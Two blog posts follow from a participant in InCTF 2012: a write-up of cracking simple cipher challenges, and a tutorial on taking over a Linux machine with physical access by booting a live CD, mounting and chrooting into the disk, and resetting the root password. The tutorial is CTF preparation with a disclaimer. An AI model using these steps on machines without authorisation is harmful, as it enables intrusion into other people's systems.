Crypto Cracking

Well, round 2 of InCTF 2012 was a blast! There was lots to do and considering that 2 of my team-mates had very limited internet access, I had to do quite a lot of heavy-lifting.

The challenges were fun and varied, ranging from Reverse-Engineering to Website Hacking. But the category that elicited the most interest from me was the Cryptography challenge. Having an old love affair with puzzles and ciphers, I got cracking.

Sadly, I do not have the questions with me as the 2nd round portal has been deactivated, however I can easily explain the concept to cracking them.

The premise was that you are a decoder in a top-secret intelligence agency that has an agent who has infiltrated a dangerous terrorist outfit. The agent’s job is to relay encrypted terrorist messages to you and our job is to decode the message and save the world.

In the first question a.k.a. the 1st transmission, we were given the encrypted message and our job was to find the location of the next meeting place of the Terrorist leaders. Well, you might’ve played this game in the newspapers that involves deciphering a message by substituting characters and looking for common words and patterns in order to figure out the cipher, that was the stratagem I applied. Finally on closer inspection, you realize the cipher is pretty simple:

“Each alphabetic character has been replaced by its numerical equivalent from the reverse alphabet, i.e. if a=1, b=2..z=26, then in the encrypted message you’ll have a=26,b=25..z=1.”

So all I had to do was write a program to manipulate the ASCII values such that whatever character I was reading, I would substitute it with 26-(ASCII value of character) and thus print out the complete legible message.

Question 1: CRACKED!

The second question was even easier than the first, on account of the hint mentioning that the agent had used a DVORAK keyboard to type the message. Simple patter recognition will tell you that all the Capital letters are conforming to the QWERTY keyboard whereas all lower-case characters have been typed using a DVORAK board but with a QWERTY board in mind. So it was simply a physical translation of keys. 🙂

Immediately fired up Wikipedia and got the layout of the DVORAK keyboard. This allowed me to do the translation in a matter of minutes. Ofcourse, I did not decipher the whole message, just the location of the next meeting.

Question 2: CRACKED! Feeling good.

Sadly, that is where the good feeling lasted till. The next two questions were supposedly easy, but since the cryptographical code was written in Python, I could not make heads or tails of what the code was doing. And since I had never worked on Python, I didn’t even have a clue as to how to run the darn code. 😛

Well, no issues. I did my part, with my team managing a rank of 16 in the 2nd round. Now looking forward to the 3rd round and some serious Flag-Capturing!!

Eviva! 😀

Breaking Into Linux

Let’s get this straight: This is just a tutorial for a competition I am participating in called India Capture The Flag or InCTF for short. I do not like, nor do I endorse cracking of other people’s systems and/or stealing of private and confidential data. I believe in building stuff, not tearing down things like password-protections.

Now that the disclaimer is out of the way, let’s do this!

There’s a really easy way to hack (or what I prefer to call “crack”) a person’s Linux machine, even if they have a Grub password in order to prevent someone from editing the files on their filesystem and getting access to their machine.

And all it needs is a Live CD. Any distro should do but generally people prefer to use the Live CD of the same distro they are trying to crack into.

Just insert the live CD into your disk tray and reboot the system, making sure that booting from disk is at a higher priority that booting from hard-drive. Then, on boot-up, select “Try Live CD without any change” and enter into the Live boot.

The first thing you should do is what every Linux lover does: Run the Terminal. Type into the terminal “sudo fdisk -l” to list out all the active drives in your system. You should be able to see which disk is the one that is being used as the primary one by the original Linux installation. Make sure you note down this drive. For this hack, we’ll assume it to be /dev/sda1.

Now comes the easy part. Having obtained the path to the primary disk partition, we create a folder/directory using “mkdir /media/temp”. Since this is a live boot, this file is not created on your hard-drive, just your RAM. Still not breaking anything.

This is where it gets interesting. We now mount the primary drive to our temporary folder, thus effectively creating a logical connection between the two. Just type “sudo mount /dev/sda1 /media/temp” into the terminal and we’re done.

Finally!! We’ve done all the preparation. We’ve stalked our prey like the merciless hunters we are. It’s now time to go in for the kill. Runnig “sudo chroot /media/temp” creates a shell with a different root directory, and passing /media/temp as the parameter gives us our primary partition as that new filesystem. So any changes now made in this shell, will be reflected directly in the primary partition. OH YEAH!!

Now it’s just a trivial matter of running “sudo passwd” to change our password to the desired one. Then all we have to do is reboot, and we’ll have complete control over the machine.

Congratulations! You are now a Linux Hacker.